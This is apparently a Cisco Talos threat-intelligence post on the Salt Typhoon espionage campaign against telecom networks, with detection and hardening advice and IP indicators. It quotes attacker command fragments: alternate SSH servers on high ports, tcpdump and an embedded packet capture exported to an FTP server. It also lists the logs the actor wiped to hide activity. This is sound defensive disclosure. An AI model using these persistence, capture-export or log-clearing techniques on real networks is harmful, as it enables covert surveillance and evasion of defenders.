Public reporting has indicated that the threat actor was able to gain access to core networking infrastructure in several instances and then use that infrastructure to collect a variety of information. There was only one case in which we found evidence suggesting that a Cisco vulnerability (CVE-2018-0171) was likely abused. In all the other incidents we have investigated to date, the initial access to Cisco devices was determined to be gained through the threat actor obtaining legitimate victim login credentials. The threat actor then demonstrated their ability to persist in target environments across equipment from multiple vendors for extended periods, maintaining access in one instance for over three years.

A hallmark of this campaign is the use of living-off-the-land (LOTL) techniques on network devices. It is important to note that while the telecommunications industry is the primary victim, the advice contained herein is relevant to, and should be considered by, all infrastructure defenders.

No new Cisco vulnerabilities were discovered during this campaign. While there have been some reports that Salt Typhoon is abusing three other known Cisco vulnerabilities, we have not identified any evidence to confirm these claims. The vulnerabilities in question are listed below. Note that each of these CVEs have security fixes available. Threat actors regularly use publicly available malicious tooling to exploit these vulnerabilities, making patching of these vulnerabilities imperative.

Therefore, our recommendation — which is consistent with our standard guidance independent of this particular case—is always to follow best practices to secure network infrastructure.

*   CVE-2018-0171 - Cisco IOS and IOS XE Software Smart Install Remote Code Execution Vulnerability (Last Updated: 15-Dec-2022)
*   CVE-2023-20198, CVE-2023-20273 - Multiple Vulnerabilities in Cisco IOS XE Software Web UI Feature (Last Updated: 1-Nov-2023)
*   CVE-2024-20399 - Cisco NX-OS Software CLI Command Injection Vulnerability (Last Updated: 17-Sep-2024)

**Activities observed****Credential use and expansion**

The use of valid, stolen credentials has been observed throughout this campaign, though it is unknown at this time exactly how the initial credentials in all cases were obtained by the threat actor. We have observed the threat actor actively attempting to acquire additional credentials by obtaining network device configurations and deciphering local accounts with weak password types—a security configuration that allows users to store passwords using cryptographically weak methods. In addition, we have observed the threat actor capturing SNMP, TACACS, and RADIUS traffic, including the secret keys used between network devices and TACACS/RADIUS servers. The intent of this traffic capture is almost certainly to enumerate additional credential details for follow-on use.

**Configuration exfiltration**

In numerous instances, the threat actor exfiltrated device configurations, often over TFTP and/or FTP. These configurations often contained sensitive authentication material, such as SNMP Read/Write (R/W) community strings and local accounts with weak password encryption types in use. The weak encryption password type would allow an attacker to trivially decrypt the password itself offline. In addition to the sensitive authentication material, configurations often contain named interfaces, which might allow an attacker to better understand the upstream and downstream network segments and use this information for additional reconnaissance and subsequent lateral movement within the network.

**Infrastructure pivoting**

A significant part of this campaign is marked by the actor’s continued movement, or pivoting, through compromised infrastructure. This “machine to machine” pivoting, or “jumping,” is likely conducted for a couple of reasons. First, it allows the threat actor to move within a trusted infrastructure set where network communications might not otherwise be permitted. Additionally, connections from this type of infrastructure are less likely to be flagged as suspicious by network defenders, allowing the threat actor to remain undetected.

The threat actor also pivoted from a compromised device operated by one telecom to target a device in another telecom. We believe that the device associated with the initial telecom was merely used as a hop point and not the intended final target in several instances. Some of these hop points were also used as a first hop for outbound data exfiltration operations. Much of this pivoting included the use of network equipment from a variety of different manufacturers.

**Configuration modification**

We observed that the threat actor had modified devices’ running configurations as well as the subsystems associated with both Bash and Guest Shell. (Guest Shell is a Linux-based virtual environment that runs on Cisco devices and allows users to execute Linux commands and utilities, including Bash.)

**_Running configuration modifications_**

*   AAA/TACACS+ server modification (server IP address change)
*   Loopback interface IP address modifications
*   GRE tunnel creation and use
*   Creation of unexpected local accounts
*   ACL modifications
*   SNMP community string modifications
*   HTTP/HTTPS server modifications on both standard and non-standard ports

**_Shell access modifications_**

*   Guest Shell enable and disable commands
*   Started SSH alternate servers on high ports for persistent access, such as sshd\_operns (on port 57722) on underlying Linux Shell or Guest Shell
    *   /usr/bin/sshd -p X
*   Created Linux-level users (modification of “/etc/shadow” and “/etc/passwd”)
*   Added SSH “authorized\_keys” under root or other users at Linux level

**_Packet capture_**

The threat actor used a variety of tools and techniques to capture packet data throughout the course of the campaign, listed below:

*   Tcpdump – Portable command-line utility used to capture packet data at the underlying operating system level.
    *   Tcpdump –i
*   Tpacap – Cisco IOS XR command line utility used to capture packets being sent to or from a given interface via netio at the underlying operating system level.
    *   Tpacap –i
*   Embedded Packet Capture (EPC) - Cisco IOS feature that allows the capture and export of packet capture data.
    *   Monitor capture CAP export ftp://<ftp\_server>
    *   Monitor capture CAP start
    *   Monitor capture CAP clear

**_Operational utility (JumbledPath)_**

The threat actor used a custom-built utility, dubbed JumbledPath, which allowed them to execute a packet capture on a remote Cisco device through an actor-defined jump-host. This tool also attempted to clear logs and impair logging along the jump-path and return the resultant compressed, encrypted capture via another unique series of actor-defined connections or jumps. This allowed the threat actor to create a chain of connections and perform the capture on a remote device. The use of this utility would help to obfuscate the original source, and ultimate destination, of the request and would also allow its operator to move through potentially otherwise non-publicly-reachable (or routable) devices or infrastructure.

This utility was written in GO and compiled as an ELF binary using an x86-64 architecture. Compiling the utility using this architecture makes it widely useable across Linux operating systems, which also includes a variety of multi-vendor network devices. This utility was found in actor configured Guestshell instances on Cisco Nexus devices.

**_Defense evasion_**

The threat actor repeatedly modified the address of the loopback interface on a compromised switch and used that interface as the source of SSH connections to additional devices within the target environment, allowing them to effectively bypass access control lists (ACLs) in place on those devices (see "Infrastructure pivoting" section).

The threat actor routinely cleared relevant logs, including .bash\_history, auth.log, lastlog, wtmp, and btmp, where applicable, to obfuscate their activities. Shell access was restored to a normal state in many cases through the use of the “guestshell disable” command.

The threat actor modified authentication, authorization, and accounting (AAA) server settings with supplemental addresses under their control to bypass access control systems.

**Detection**

We recommend taking the following steps to identify suspicious activity that may be related to this campaign:

*   Conduct comprehensive configuration management (inclusive of auditing), in line with best practices.
*   Conduct comprehensive authentication/authorization/command issuance monitoring.
*   Monitor syslog and AAA logs for unusual activity, including a decrease in normal logging events, or a gap in logged activity.
*   Monitor your environment for unusual changes in behavior or configuration.
*   Profile (fingerprint via NetFlow and port scanning) network devices for a shift in surface view, including new ports opening/closing and traffic to/from (not traversing).
*   Where possible, develop NetFlow visibility to identify unusual volumetric changes.
*   Look for non-empty or unusually large .bash\_history files.
*   Additional identification and detection can be performed using the Cisco forensic guides.

**Preventative measures**

The following guidance applies to entities in all sectors.

*   **Cisco-specific measures**
    *   Always disable the underlying non-encrypted web server using the “no ip http server” command. If web management is not required, disable all of the underlying web servers using “no ip http server” and “no ip http secure-server" commands.
    *   Disable telnet and ensure it is not available on any of the Virtual Teletype (VTY) lines on Cisco devices by configuring all VTY stanzas with “transport input ssh” and “transport output none”.
    *   If not required, disable the guestshell access using “guestshell disable” for those versions which support the guestshell service.
    *   Disable Cisco’s Smart Install service using “no vstack”.
    *   Utilize type 8 passwords for local account credential configuration.
    *   Use type 6 for TACACS+ key configuration.
*   **General measures**
    *   Rigorously adhere to security best practices, including updating, access controls, user education, and network segmentation.
    *   Stay up-to-date on security advisories from the U.S. government and industry, and consider suggested configuration changes to mitigate described issues.
    *   Update devices as aggressively as possible. This includes patching current hardware and software against known vulnerabilities and replacing end-of-life hardware and software.
        *   Select complex passwords and community strings and avoid default credentials.
    *   Use multi-factor authentication (MFA).
    *   Encrypt all monitoring and configuration traffic (SNMPv3, HTTPS, SSH, NETCONF, RESTCONF).
    *   Lockdown and aggressively monitor credential systems, such as TACACS+ and any jump hosts.
    *   Utilize AAA to deny configuration modifications of key device protections (e.g., local accounts, TACACS+, RADIUS).
    *   Prevent and monitor for exposure of administrative or unusual interfaces (e.g., SNMP, SSH, HTTP(s)).
    *   Disable all non-encrypted web management capabilities.
    *   Verify existence and correctness of access control lists for all management protocols (e.g., SNMP, SSH, Netconf, etc.).
    *   Enhance overall credential and password management practices with stronger keys and/or encryption.
        *   Use type 8 passwords for local account credential configuration.
        *   Use type 6 for TACACS+ key configuration.
    *   Store configurations centrally and push to devices. Do NOT allow devices to be the trusted source of truth for their configurations.

There are several reasons to believe this activity is being carried out by a highly sophisticated, well-funded threat actor, including the targeted nature of this campaign, the deep levels of developed access into victim networks, and the threat actor’s extensive technical knowledge. Furthermore, the long timeline of this campaign suggests a high degree of coordination, planning, and patience—standard hallmarks of advanced persistent threat (APT) and state-sponsored actors.

During this investigation, we also observed additional pervasive targeting of Cisco devices with exposed Smart Install (SMI) and the subsequent abuse of CVE-2018-0171, a vulnerability in the Smart Install feature of Cisco IOS and Cisco IOS XE software. This activity appears to be unrelated to the Salt Typhoon operations, and we have not yet been able to attribute it to a specific actor. The IP addresses provided as observables below are associated with this potentially unrelated SMI activity.

Legacy devices with known vulnerabilities, such as Smart Install (CVE-2018-0171), should be patched or decommissioned if no longer in use. Even if the device is a non-critical device, or carries no traffic, it may be used as an entry door for the threat actor to pivot to other more critical devices.

The findings in this blog represent Cisco Talos’ understanding of the attacks outlined herein. This campaign and its impact are still being researched, and the situation continues to evolve. As such, this post may be updated at any time to reflect new findings or adjustments to assessments.

**Indicators of Compromise (IOCs)****IP Addresses:**

185\[.\]141\[.\]24\[.\]28

185\[.\]82\[.\]200\[.\]181

Tag

#mac